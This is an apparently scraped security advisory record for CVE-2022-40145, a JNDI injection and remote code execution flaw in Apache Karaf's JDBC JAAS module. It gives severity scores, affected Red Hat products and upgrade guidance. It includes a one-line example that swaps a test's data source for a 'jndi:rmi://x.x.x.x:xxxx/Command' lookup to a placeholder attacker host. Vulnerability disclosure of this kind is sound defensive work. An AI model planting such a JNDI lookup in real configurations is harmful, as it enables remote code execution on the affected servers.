{"bugzilla": {"description": "karaf: JDBC JAAS LDAP injection", "id": "2257304", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257304"}, "csaw": false, "cvss3": {"cvss3_base_score": "9.8", "cvss3_scoring_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "status": "draft"}, "cwe": "CWE-20", "details": ["This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.\nThe function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource\nuse InitialContext.lookup(jndiName) without filtering.\nAn user can modify\u00a0`options.put(JDBCUtils.DATASOURCE, \"osgi:\" +\u00a0DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in JdbcLoginModuleTest#setup.\nThis is vulnerable to a remote code execution (RCE) attack when a\nconfiguration uses a JNDI LDAP data source URI when an attacker has\ncontrol of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.\nWe encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8", "A flaw was found in Apache Karaf. This issue may allow an attacker to control the LDAP server used by the JDBC JNDI URL and execute code remotely (RCE)."], "mitigation": {"lang": "en:us", "value": "No mitigation is currently available."}, "name": "CVE-2022-40145", "package_state": [{"cpe": "cpe:/a:redhat:jboss_enterprise_brms_platform:7", "fix_state": "Not affected", "package_name": "Karaf", "product_name": "Red Hat Decision Manager 7"}, {"cpe": "cpe:/a:redhat:jboss_fuse:7", "fix_state": "Not affected", "package_name": "Karaf", "product_name": "Red Hat Fuse 7"}, {"cpe": "cpe:/a:redhat:jboss_amq:6", "fix_state": "Out of support scope", "package_name": "karaf", "product_name": "Red Hat JBoss A-MQ 6"}, {"cpe": "cpe:/a:redhat:jboss_data_grid:7", "fix_state": "Out of support scope", "package_name": "karaf", "product_name": "Red Hat JBoss Data Grid 7"}, {"cpe": "cpe:/a:redhat:jboss_fuse:6", "fix_state": "Out of support scope", "package_name": "Karaf", "product_name": "Red Hat JBoss Fuse 6"}, {"cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7", "fix_state": "Not affected", "package_name": "karaf", "product_name": "Red Hat Process Automation 7"}], "public_date": "2022-12-21T00:00:00Z", "references": ["https://www.cve.org/CVERecord?id=CVE-2022-40145\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-40145\nhttps://karaf.apache.org/security/cve-2022-40145.txt"], "statement": "This attack requires previous control of the LDAP target server in order to obtain access and perform code execution. Considering the pre-requisites for this vulnerability to be exploited, the impact is Important and not Critical.", "threat_severity": "Important"}

{

bugzilla : { »

description : karaf: JDBC JAAS LDAP injection (string)

id : 2257304 (string)

url : https://bugzilla.redhat.com/show_bug.cgi?id=2257304 (string)

}

csaw : false (boolean)

cvss3 : { »

cvss3_base_score : 9.8 (string)

cvss3_scoring_vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (string)

status : draft (string)

}

cwe : CWE-20 (string)

details : [ »

0 : This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 (string)

1 : A flaw was found in Apache Karaf. This issue may allow an attacker to control the LDAP server used by the JDBC JNDI URL and execute code remotely (RCE). (string)

]

mitigation : { »

lang : en:us (string)

value : No mitigation is currently available. (string)

}

name : CVE-2022-40145 (string)

package_state : [ »

0 : { »

cpe : cpe:/a:redhat:jboss_enterprise_brms_platform:7 (string)

fix_state : Not affected (string)

package_name : Karaf (string)

product_name : Red Hat Decision Manager 7 (string)

}

1 : { »

cpe : cpe:/a:redhat:jboss_fuse:7 (string)

fix_state : Not affected (string)

package_name : Karaf (string)

product_name : Red Hat Fuse 7 (string)

}

2 : { »

cpe : cpe:/a:redhat:jboss_amq:6 (string)

fix_state : Out of support scope (string)

package_name : karaf (string)

product_name : Red Hat JBoss A-MQ 6 (string)

}

3 : { »

cpe : cpe:/a:redhat:jboss_data_grid:7 (string)

fix_state : Out of support scope (string)

package_name : karaf (string)

product_name : Red Hat JBoss Data Grid 7 (string)

}

4 : { »

cpe : cpe:/a:redhat:jboss_fuse:6 (string)

fix_state : Out of support scope (string)

package_name : Karaf (string)

product_name : Red Hat JBoss Fuse 6 (string)

}

5 : { »

cpe : cpe:/a:redhat:jboss_enterprise_bpms_platform:7 (string)

fix_state : Not affected (string)

package_name : karaf (string)

product_name : Red Hat Process Automation 7 (string)

}

]

public_date : 2022-12-21T00:00:00Z (string)

references : [ »

0 : https://www.cve.org/CVERecord?id=CVE-2022-40145 https://nvd.nist.gov/vuln/detail/CVE-2022-40145 https://karaf.apache.org/security/cve-2022-40145.txt (string)

]

statement : This attack requires previous control of the LDAP target server in order to obtain access and perform code execution. Considering the pre-requisites for this vulnerability to be exploited, the impact is Important and not Critical. (string)

threat_severity : Important (string)

}

Metrics

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

Exploitation none

Automatable yes

Technical Impact total

Affected Vendors & Products

Metrics

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

Exploitation none

Automatable yes

Technical Impact total

Affected Vendors & Products

JSON object

JSON object

JSON object

JSON object